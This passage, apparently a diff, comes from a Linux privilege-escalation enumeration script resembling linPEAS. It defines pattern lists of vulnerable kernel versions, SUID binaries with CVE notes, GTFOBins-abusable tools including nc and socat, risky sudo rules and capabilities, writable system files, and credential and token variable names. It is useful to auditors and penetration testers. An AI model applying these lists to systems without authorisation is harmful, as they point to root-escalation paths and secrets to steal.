1.el6|2.6.32-279.11.1.el6|2.6.32-279.14.1.bgq.el6|2.6.32-279.14.1.el6|2.6.32-279.19.1.el6|2.6.32-279.22.1.el6|2.6.32-279.23.1.el6|2.6.32-279.25.1.el6|2.6.32-279.25.2.el6|2.6.32-279.31.1.el6|2.6.32-279.33.1.el6|2.6.32-279.34.1.el6|2.6.32-279.37.2.el6|2.6.32-279.39.1.el6" +kernelDCW_Rhel6_3="2.6.32-279.41.1.el6|2.6.32-279.42.1.el6|2.6.32-279.43.1.el6|2.6.32-279.43.2.el6|2.6.32-279.46.1.el6|2.6.32-358.el6|2.6.32-358.0.1.el6|2.6.32-358.2.1.el6|2.6.32-358.6.1.el6|2.6.32-358.6.2.el6|2.6.32-358.6.3.p7ih.el6|2.6.32-358.11.1.bgq.el6|2.6.32-358.11.1.el6|2.6.32-358.14.1.el6|2.6.32-358.18.1.el6|2.6.32-358.23.2.el6|2.6.32-358.28.1.el6|2.6.32-358.32.3.el6|2.6.32-358.37.1.el6|2.6.32-358.41.1.el6|2.6.32-358.44.1.el6|2.6.32-358.46.1.el6|2.6.32-358.46.2.el6|2.6.32-358.48.1.el6|2.6.32-358.49.1.el6|2.6.32-358.51.1.el6|2.6.32-358.51.2.el6|2.6.32-358.55.1.el6|2.6.32-358.56.1.el6|2.6.32-358.59.1.el6|2.6.32-358.61.1.el6|2.6.32-358.62.1.el6|2.6.32-358.65.1.el6|2.6.32-358.67.1.el6|2.6.32-358.68.1.el6|2.6.32-358.69.1.el6|2.6.32-358.70.1.el6|2.6.32-358.71.1.el6|2.6.32-358.72.1.el6|2.6.32-358.73.1.el6|2.6.32-358.111.1.openstack.el6|2.6.32-358.114.1.openstack.el6|2.6.32-358.118.1.openstack.el6|2.6.32-358.123.4.openstack.el6|2.6.32-431.el6|2.6.32-431.1.1.bgq.el6|2.6.32-431.1.2.el6|2.6.32-431.3.1.el6|2.6.32-431.5.1.el6|2.6.32-431.11.2.el6|2.6.32-431.17.1.el6|2.6.32-431.20.3.el6|2.6.32-431.20.5.el6|2.6.32-431.23.3.el6|2.6.32-431.29.2.el6|2.6.32-431.37.1.el6|2.6.32-431.40.1.el6|2.6.32-431.40.2.el6|2.6.32-431.46.2.el6|2.6.32-431.50.1.el6|2.6.32-431.53.2.el6|2.6.32-431.56.1.el6|2.6.32-431.59.1.el6|2.6.32-431.61.2.el6|2.6.32-431.64.1.el6|2.6.32-431.66.1.el6|2.6.32-431.68.1.el6|2.6.32-431.69.1.el6|2.6.32-431.70.1.el6" +kernelDCW_Rhel6_4="2.6.32-431.71.1.el6|2.6.32-431.72.1.el6|2.6.32-431.73.2.el6|2.6.32-431.74.1.el6|2.6.32-504.el6|2.6.32-504.1.3.el6|2.6.32-504.3.3.el6|2.6.32-504.8.1.el6|2.6.32-504.8.2.bgq.el6|2.6.32-504.12.2.el6|2.6.32-504.16.2.el6|2.6.32-504.23.4.el6|2.6.32-504.30.3.el6|2.6.32-504.30.5.p7ih.el6|2.6.32-504.33.2.el6|2.6.32-504.36.1.el6|2.6.32-504.38.1.el6|2.6.32-504.40.1.el6|2.6.32-504.43.1.el6|2.6.32-504.46.1.el6|2.6.32-504.49.1.el6|2.6.32-504.50.1.el6|2.6.32-504.51.1.el6|2.6.32-504.52.1.el6|2.6.32-573.el6|2.6.32-573.1.1.el6|2.6.32-573.3.1.el6|2.6.32-573.4.2.bgq.el6|2.6.32-573.7.1.el6|2.6.32-573.8.1.el6|2.6.32-573.12.1.el6|2.6.32-573.18.1.el6|2.6.32-573.22.1.el6|2.6.32-573.26.1.el6|2.6.32-573.30.1.el6|2.6.32-573.32.1.el6|2.6.32-573.34.1.el6|2.6.32-642.el6|2.6.32-642.1.1.el6|2.6.32-642.3.1.el6|2.6.32-642.4.2.el6|2.6.32-642.6.1.el6" +kernelDCW_Rhel7="3.10.0-229.rt56.141.el7|3.10.0-229.1.2.rt56.141.2.el7_1|3.10.0-229.4.2.rt56.141.6.el7_1|3.10.0-229.7.2.rt56.141.6.el7_1|3.10.0-229.11.1.rt56.141.11.el7_1|3.10.0-229.14.1.rt56.141.13.el7_1|3.10.0-229.20.1.rt56.141.14.el7_1|3.10.0-229.rt56.141.el7|3.10.0-327.rt56.204.el7|3.10.0-327.4.5.rt56.206.el7_2|3.10.0-327.10.1.rt56.211.el7_2|3.10.0-327.13.1.rt56.216.el7_2|3.10.0-327.18.2.rt56.223.el7_2|3.10.0-327.22.2.rt56.230.el7_2|3.10.0-327.28.2.rt56.234.el7_2|3.10.0-327.28.3.rt56.235.el7|3.10.0-327.36.1.rt56.237.el7|3.10.0-123.el7|3.10.0-123.1.2.el7|3.10.0-123.4.2.el7|3.10.0-123.4.4.el7|3.10.0-123.6.3.el7|3.10.0-123.8.1.el7|3.10.0-123.9.2.el7|3.10.0-123.9.3.el7|3.10.0-123.13.1.el7|3.10.0-123.13.2.el7|3.10.0-123.20.1.el7|3.10.0-229.el7|3.10.0-229.1.2.el7|3.10.0-229.4.2.el7|3.10.0-229.7.2.el7|3.10.0-229.11.1.el7|3.10.0-229.14.1.el7|3.10.0-229.20.1.el7|3.10.0-229.24.2.el7|3.10.0-229.26.2.el7|3.10.0-229.28.1.el7|3.10.0-229.30.1.el7|3.10.0-229.34.1.el7|3.10.0-229.38.1.el7|3.10.0-229.40.1.el7|3.10.0-229.42.1.el7|3.10.0-327.el7|3.10.0-327.3.1.el7|3.10.0-327.4.4.el7|3.10.0-327.4.5.el7|3.10.0-327.10.1.el7|3.10.0-327.13.1.el7|3.10.0-327.18.2.el7|3.10.0-327.22.2.el7|3.10.0-327.28.2.el7|3.10.0-327.28.3.el7|3.10.0-327.36.1.el7|3.10.0-327.36.2.el7|3.10.0-229.1.2.ael7b|3.10.0-229.4.2.ael7b|3.10.0-229.7.2.ael7b|3.10.0-229.11.1.ael7b|3.10.0-229.14.1.ael7b|3.10.0-229.20.1.ael7b|3.10.0-229.24.2.ael7b|3.10.0-229.26.2.ael7b|3.10.0-229.28.1.ael7b|3.10.0-229.30.1.ael7b|3.10.0-229.34.1.ael7b|3.10.0-229.38.1.ael7b|3.10.0-229.40.1.ael7b|3.10.0-229.42.1.ael7b|4.2.0-0.21.el7" + + +MyUID=`id -u $(whoami)` +if [ `echo $MyUID` ]; then myuid=$MyUID; elif [ `id -u $(whoami) 2>/dev/null` ]; then myuid=`id -u $(whoami) 2>/dev/null`; elif [ `id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1` ]; then myuid=`id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1`; fi +if [ $myuid -gt 2147483646 ]; then baduid="|$myuid"; fi +idB="euid|egid$baduid" +sudovB="[01].[012345678].[0-9]+|1.9.[01234]|1.9.5p1" + +mounted=`(mount -l || cat /proc/mounts || cat /proc/self/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|'``cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}'` +if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi #Don't let any blacklist to be empty +mountG="swap|/cdrom|/floppy|/dev/shm" +notmounted=`cat /etc/fstab 2>/dev/null | grep "^/" | grep -Ev "$mountG" | awk '{print $1}' | grep -Ev "$mounted" | tr '\n' '|'`"ImPoSSssSiBlEee" +mountpermsB="\Wsuid|\Wuser|\Wexec" +mountpermsG="nosuid|nouser|noexec" + +rootcommon="/init$|upstart-udev-bridge|udev|/getty|cron|apache2|java|tomcat|/vmtoolsd|/VGAuthService" + +groupsB="\(root\)|\(shadow\)|\(admin\)|\(video\)|\(adm\)|\(wheel\)|\(auth\)" +groupsVB="\(sudo\)|\(docker\)|\(lxd\)|\(disk\)|\(lxc\)" +knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' #https://www.togaware.com/linux/survivor/Standard_Groups.html +mygroups=`groups 2>/dev/null | tr " " "|"` + +sidG1="/abuild-sudo$|/accton$|/allocate$|/ARDAgent|/arping$|/atq$|/atrm$|/authpf$|/authpf-noip$|/authopen$|/batch$|/bbsuid$|/bsd-write$|/btsockstat$|/bwrap$|/cacaocsc$|/camel-lock-helper-1.2$|/ccreds_validate$|/cdrw$|/chage$|/check-foreground-console$|/chrome-sandbox$|/chsh$|/cons.saver$|/crontab$|/ct$|/cu$|/dbus-daemon-launch-helper$|/deallocate$|/desktop-create-kmenu$|/dma$|/dma-mbox-create$|/dmcrypt-get-device$|/doas$|/dotlockfile$|/dotlock.mailutils$|/dtaction$|/dtfile$|/eject$|/execabrt-action-install-debuginfo-to-abrt-cache$|/execdbus-daemon-launch-helper$|/execdma-mbox-create$|/execlockspool$|/execlogin_chpass$|/execlogin_lchpass$|/execlogin_passwd$|/execssh-keysign$|/execulog-helper$|/exim4|/expiry$|/fdformat$|/fstat$|/fusermount$|/fusermount3$|/gnome-pty-helper$|/glines$|/gnibbles$|/gnobots2$|/gnome-suspend$|/gnometris$|/gnomine$|/gnotski$|/gnotravex$|/gpasswd$|/gpg$|/gpio$|/gtali|/.hal-mtab-lock$|/imapd$|/inndstart$|/kismet_cap_nrf_51822$|/kismet_cap_nxp_kw41z$|/kismet_cap_ti_cc_2531$|/kismet_cap_ti_cc_2540$|/kismet_cap_ubertooth_one$|/kismet_capture$|/kismet_cap_linux_bluetooth$|/kismet_cap_linux_wifi$|/kismet_cap_nrf_mousejack$|/ksu$|/list_devices$|/locate$|/lock$|/lockdev$|/lockfile$|/login_activ$|/login_crypto$|/login_radius$|/login_skey$|/login_snk$|/login_token$|/login_yubikey$|/lpc$|/lpd$|/lpd-port$|/lppasswd$|/lpq$|/lpr$|/lprm$|/lpset$|/lxc-user-nic$|/mahjongg$|/mail-lock$|/mailq$|/mail-touchlock$|/mail-unlock$|/mksnap_ffs$|/mlocate$|/mlock$|/mount.cifs$|/mount.nfs$|/mount.nfs4$|/mtr$|/mutt_dotlock$" +sidG2="/ncsa_auth$|/netpr$|/netkit-rcp$|/netkit-rlogin$|/netkit-rsh$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/nvmmctl$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/ping$|/ping6$|/pmconfig$|/pmap$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pstat$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/rcmd|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/sliplogin|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/snap-confine$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/staprun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/sysstat$|/systat$|/telnetlogin$|/timedc$|/tip$|/top$|/traceroute6$|/traceroute6.iputils$|/trpt$|/tsoldtlabel$|/tsoljdslabel$|/tsolxagent$|/ufsdump$|/ufsrestore$|/ulog-helper$|/umount.cifs$|/umount.nfs$|/umount.nfs4$|/unix_chkpwd$|/uptime$|/userhelper$|/userisdnctl$|/usernetctl$|/utempter$|/utmp_update$|/uucico$|/uuglist$|/uuidd$|/uuname$|/uusched$|/uustat$|/uux$|/uuxqt$|/vmstat$|/vmware-user-suid-wrapper$|/vncserver-x11$|/volrmmount$|/w$|/wall$|/whodo$|/write$|/X$|/Xorg.wrap$|/Xsun$|/Xvnc$|/yppasswd$" + +#Rules: Start path " /", end path "$", divide path and vulnversion "%". SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION +sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ + /at$%RTru64_UNIX_4.0g\(CVE-2002-1614\)\ + /abrt-action-install-debuginfo-to-abrt-cache$%CENTOS 7.1/Fedora22 + /chfn$%SuSE_9.3/10\ + /chkey$%Solaris_2.5.1\ + /chkperm$%Solaris_7.0_\ + /chpass$%2Vulns:OpenBSD_6.1_to_OpenBSD 6.6\(CVE-2019-19726\)--OpenBSD_2.7_i386/OpenBSD_2.6_i386/OpenBSD_2.5_1999/08/06/OpenBSD_2.5_1998/05/28/FreeBSD_4.0-RELEASE/FreeBSD_3.5-RELEASE/FreeBSD_3.4-RELEASE/NetBSD_1.4.2\ + /chpasswd$%SquirrelMail\(2004-04\)\ + /dtappgather$%Solaris_7_<_11_\(SPARC/x86\)\(CVE-2017-3622\)\ + /dtprintinfo$%Solaris_10_\(x86\)_and_lower_versions_also_SunOS_5.7_to_5.10\ + /dtsession$%Oracle_Solaris_10_1/13_and_earlier\(CVE-2020-2696\)\ + /eject$%FreeBSD_mcweject_0.9/SGI_IRIX_6.2\ + /ibstat$%IBM_AIX_Version_6.1/7.1\(09-2013\)\ + /kcheckpass$%KDE_3.2.0_<-->_3.4.2_\(both_included\)\ + /kdesud$%KDE_1.1/1.1.1/1.1.2/1.2\ + /keybase-redirector%CentOS_Linux_release_7.4.1708\ + /login$%IBM_AIX_3.2.5/SGI_IRIX_6.4\ + /lpc$%S.u.S.E_Linux_5.2\ + /lpr$%BSD/OS2.1/FreeBSD2.1.5/NeXTstep4.x/IRIX6.4/SunOS4.1.3/4.1.4\(09-1996\)\ + /mail.local$%NetBSD_7.0-7.0.1__6.1-6.1.5__6.0-6.0.6 + /mount$%Apple_Mac_OSX\(Lion\)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8\ + /movemail$%Emacs\(08-1986\)\ + /mrinfo$%NetBSD_Sep_17_2002_https://securitytracker.com/id/1005234\ + /mtrace$%NetBSD_Sep_17_2002_https://securitytracker.com/id/1005234\ + /netprint$%IRIX_5.3/6.2/6.3/6.4/6.5/6.5.11\ + /newgrp$%HP-UX_10.20\ + /ntfs-3g$%Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others\(02-2017\)\ + /passwd$%Apple_Mac_OSX\(03-2006\)/Solaris_8/9\(12-2004\)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1\(02-1997\)\ + /pkexec$%Linux4.10_to_5.1.17\(CVE-2019-13272\)/rhel_6\(CVE-2011-1485\)\ + /pppd$%Apple_Mac_OSX_10.4.8\(05-2007\)\ + /pt_chown$%GNU_glibc_2.1/2.1.1_-6\(08-1999\)\ + /pulseaudio$%\(Ubuntu_9.04/Slackware_12.2.0\)\ + /rcp$%RedHat_6.2\ + /rdist$%Solaris_10/OpenSolaris\ + /rsh$%Apple_Mac_OSX_10.9.5/10.10.5\(09-2015\)\ + /screen$%GNU_Screen_4.5.0\ + /sdtcm_convert$%Sun_Solaris_7.0\ + /sendmail$%Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2.4.0-test1_\(SGI_ProPack_1.2/1.3\)\ + /check_sudo_version$\ + /sudoedit$%Sudo/SudoEdit_1.6.9p21/1.7.2p4/\(RHEL_5/6/7/Ubuntu\)/Sudo<=1.8.14\ + /tmux$%Tmux_1.3_1.4_privesc\(CVE-2011-1496\)\ + /traceroute$%LBL_Traceroute_\[2000-11-15\]\ + /ubuntu-core-launcher$%Befre_1.0.27.1\(CVE-2016-1580\)\ + /umount$%BSD/Linux\(08-1996\)\ + /umount-loop$%Rocks_Clusters<=4.1\(07-2006\)\ + /uucp$%Taylor_UUCP_1.0.6\ + /XFree86$%XFree86_X11R6_3.3.x/4.0/4.x/3.3\(03-2003\)\ + /xlock$%BSD/OS_2.1/DG/UX_7.0/Debian_1.3/HP-UX_10.34/IBM_AIX_4.2/SGI_IRIX_6.4/Solaris_2.5.1\(04-1997\)\ + /xscreensaver%Solaris_11.x\(CVE-2019-3010\)\ + /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\ + /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)" +#To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|' +sidVB='/apt-get$|/apt$|/aria2c$|/arp$|/ash$|/awk$|/base32$|/base64$|/bash$|/bpftrace$|/bundler$|/busctl$|/busybox$|/byebug$|/cancel$|/cat$|/chmod$|/chown$|/chroot$|/cobc$|/composer$|/cp$|/cpan$|/cpulimit$|/crash$|/crontab$|/csh$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dmesg$|/dmsetup$|/dnf$|/docker$|/dpkg$|/easy_install$|/eb$|/ed$|/emacs$|/env$|/eqn$|/expand$|/expect$|/facter$|/file$|/find$|/finger$|/flock$|/fmt$|/fold$|/ftp$|/gawk$|/gcc$|/gdb$|/gem$|/genisoimage$|/ghc$|/ghci$|/gimp$|/git$|/grep$|/gtester$|/hd$|/head$|/hexdump$|/highlight$|/iconv$|/iftop$|/ionice$|/ip$|/irb$|/jjs$|/journalctl$|/jq$|/jrunscript$|/ksh$|/ksshell$|/ld$|/ldconfig$|/less$|/logsave$|/look$|/ltrace$|/lua$|/lwp-download$|/lwp-request$|/mail$|/make$|/man$|/mawk$|/more$|/mount$|/mtr$|/mv$|/mysql$|/nano$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/nroff$|/nsenter$|/od$|/openssl$|/pdb$|/perl$|/pg$|/php$|/pic$|/pico$|/pip$|/pkexec$|/pry$|/puppet$|/python$|/rake$|/readelf$|/red$|/redcarpet$|/restic$|/rlogin$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/ruby$|/run-mailcap$|/run-parts$|/rview$|/rvim$|/scp$|/screen$|/script$|/sed$|/service$|/setarch$|/sftp$|/shuf$|/smbclient$|/socat$|/soelim$|/sort$|/sqlite3$|/ssh$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/su$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tclsh$|/tcpdump$|/tee$|/telnet$|/tftp$|/time$|/timeout$|/tmux$|/top$|/ul$|/unexpand$|/uniq$|/unshare$|/uudecode$|/uuencode$|/valgrind$|/vi$|/view$|/vim$|/watch$|/wget$|/whois$|/wish$|/xargs$|/xxd$|/xz$|/yelp$|/yum$|/zip$|/zsh$|/zsoelim$|/zypper$' +cfuncs='file|free|main|more|read|split|write' + +sudoVB=" \*|env_keep\+=LD_PRELOAD|apt-get$|apt$|aria2c$|arp$|ash$|awk$|base64$|bash$|busybox$|cat$|chmod$|chown$|cp$|cpan$|cpulimit$|crontab$|csh$|curl$|cut$|dash$|date$|dd$|diff$|dmesg$|dmsetup$|dnf$|docker$|dpkg$|easy_install$|ed$|emacs$|env$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gdb$|gimp$|git$|grep$|head$|ionice$|ip$|irb$|jjs$|journalctl$|jq$|jrunscript$|ksh$|ld.so$|less$|logsave$|ltrace$|lua$|mail$|make$|man$|more$|mount$|mtr$|mv$|mysql$|nano$|nc$|nice$|nl$|nmap$|node$|od$|openssl$|perl$|pg$|php$|pic$|pico$|pip$|puppet$|python$|readelf$|red$|rlwrap$|rpm$|rpmquery$|rsync$|ruby$|run-mailcap$|run-parts$|rvim$|scp$|screen$|script$|sed$|service$|setarch$|sftp$|smbclient$|socat$|sort$|sqlite3$|ssh$|start-stop-daemon$|stdbuf$|strace$|systemctl$|tail$|tar$|taskset$|tclsh$|tcpdump$|tee$|telnet$|tftp$|time$|timeout$|tmux$|ul$|unexpand$|uniq$|unshare$|vi$|vim$|watch$|wget$|wish$|xargs$|xxd$|yum$|zip$|zsh$|zypper$" +sudoB="$(whoami)|ALL:ALL|ALL : ALL|ALL|NOPASSWD|SETENV|/apache2|/cryptsetup|/mount" +sudoG="NOEXEC" + +sudocapsB="/apt-get|/apt|/aria2c|/arp|/ash|/awk|/base64|/bash|/busybox|/cat|/chmod|/chown|/cp|/cpan|/cpulimit|/crontab|/csh|/curl|/cut|/dash|/date|/dd|/diff|/dmesg|/dmsetup|/dnf|/docker|/dpkg|/easy_install|/ed|/emacs|/env|/expand|/expect|/facter|/file|/find|/flock|/fmt|/fold|/ftp|/gdb|/gimp|/git|/grep|/head|/ionice|/ip|/irb|/jjs|/journalctl|/jq|/jrunscript|/ksh|/ld.so|/less|/logsave|/ltrace|/lua|/mail|/make|/man|/more|/mount|/mtr|/mv|/mysql|/nano|/nc|/nice|/nl|/nmap|/node|/od|/openssl|/perl|/pg|/php|/pic|/pico|/pip|/puppet|/python|/readelf|/red|/rlwrap|/rpm|/rpmquery|/rsync|/ruby|/run-mailcap|/run-parts|/rvim|/scp|/screen|/script|/sed|/service|/setarch|/sftp|/smbclient|/socat|/sort|/sqlite3|/ssh|/start-stop-daemon|/stdbuf|/strace|/systemctl|/tail|/tar|/taskset|/tclsh|/tcpdump|/tee|/telnet|/tftp|/time|/timeout|/tmux|/ul|/unexpand|/uniq|/unshare|/vi|/vim|/watch|/wget|/wish|/xargs|/xxd|/yum|/zip|/zsh|/zypper" +capsB="=ep|cap_chown|cap_dac_override|cap_dac_read_search|cap_setuid|sys_admin|sys_ptrace|sys_module" +containercapsB="sys_admin|sys_ptrace|sys_module|dac_read_search|dac_override" + +OLDPATH=$PATH +ADDPATH=":/usr/local/sbin\ + :/usr/local/bin\ + :/usr/sbin\ + :/usr/bin\ + :/sbin\ + :/bin" +spath=":$PATH" +for P in $ADDPATH; do + if [ ! -z "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi +done + +# test if sed supports -E or -r +E=E +echo | sed -${E} 's/o/a/' 2>/dev/null +if [ $? -ne 0 ] ; then + echo | sed -r 's/o/a/' 2>/dev/null + if [ $? -eq 0 ] ; then + E=r + else + echo "${Y}WARNING: No suitable option found for extended regex with sed. Continuing but the results might be unreliable.${NC}" + fi +fi + +writeB="00-header|10-help-text|50-motd-news|80-esm|91-release-upgrade|\.sh$|\./|/authorized_keys|/bin/|/boot/|/etc/apache2/apache2.conf|/etc/apache2/httpd.conf|/etc/hosts.allow|/etc/hosts.deny|/etc/httpd/conf/httpd.conf|/etc/httpd/httpd.conf|/etc/inetd.conf|/etc/incron.conf|/etc/login.defs|/etc/logrotate.d/|/etc/modprobe.d/|/etc/pam.d/|/etc/php.*/fpm/pool.d/|/etc/php/.*/fpm/pool.d/|/etc/rsyslog.d/|/etc/skel/|/etc/sysconfig/network-scripts/|/etc/sysctl.conf|/etc/sysctl.d/|/etc/uwsgi/apps-enabled/|/etc/xinetd.conf|/etc/xinetd.d/|/etc/|/home//|/lib/|/log/|/mnt/|/root|/sys/|/usr/bin|/usr/games|/usr/lib|/usr/local/bin|/usr/local/games|/usr/local/sbin|/usr/sbin|/sbin/|/var/log/|\.timer$|\.service$|.socket$" +writeVB="/etc/anacrontab|/etc/bash.bashrc|/etc/bash_completion|/etc/bash_completion.d/|/etc/cron|/etc/environment|/etc/environment.d/|/etc/group|/etc/incron.d/|/etc/init|/etc/ld.so.conf.d/|/etc/master.passwd|/etc/passwd|/etc/profile.d/|/etc/profile|/etc/rc.d|/etc/shadow|/etc/skey/|/etc/sudoers|/etc/sudoers.d/|/etc/supervisor/conf.d/|/etc/supervisor/supervisord.conf|/etc/systemd|/etc/sys|/lib/systemd|/etc/update-motd.d/|/root/.ssh/|/run/systemd|/usr/lib/systemd|/systemd/system|/var/db/yubikey/|/var/spool/anacron|/var/spool/cron/crontabs|"`echo $PATH 2>/dev/null | sed 's/:\.:/:/g' | sed 's/:\.$//g' | sed 's/^\.://g' | sed 's/:/$|^/g'` #Add Path but remove simple dot in PATH + +if [ "$MACPEAS" ]; then + sh_usrs="ImPoSSssSiBlEee" + nosh_usrs="ImPoSSssSiBlEee" + dscl . list /Users | while read uname; do + ushell=`dscl . -read "/Users/$uname" UserShell | cut -d " " -f2` + if [ "`grep \"$ushell\" /etc/shells`" ]; then sh_usrs="$sh_usrs|$uname"; else nosh_usrs="$nosh_usrs|$uname"; fi + done +else + sh_usrs=`cat /etc/passwd 2>/dev/null | grep -v "^root:" | grep -i "sh$" | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/' | sed 's/|sys|/|sys[\\\s:]|^sys$|/' | sed 's/|daemon|/|daemon[\\\s:]|^daemon$|/'`"ImPoSSssSiBlEee" #Modified bin, sys and daemon so they are not colored everywhere + nosh_usrs=`cat /etc/passwd 2>/dev/null | grep -i -v "sh$" | sort | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/'`"ImPoSSssSiBlEee" +fi +knw_usrs='daemon\W|^daemon$|message\+|syslog|www|www-data|mail|noboby|Debian\-\+|rtkit|systemd\+' +USER=`whoami` +if [ ! "$HOME" ]; then + if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; #Mac home + else HOME="/home/$USER"; + fi +fi +Groups="ImPoSSssSiBlEee"`groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|'` + +#This variables are dived in several different ones because NetBSD required it +pwd_inside_history="7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|root|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|xfreerdp|^ssh|steghide|@" +pwd_in_variables1="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID" +pwd_in_variables2="AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_REPO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TES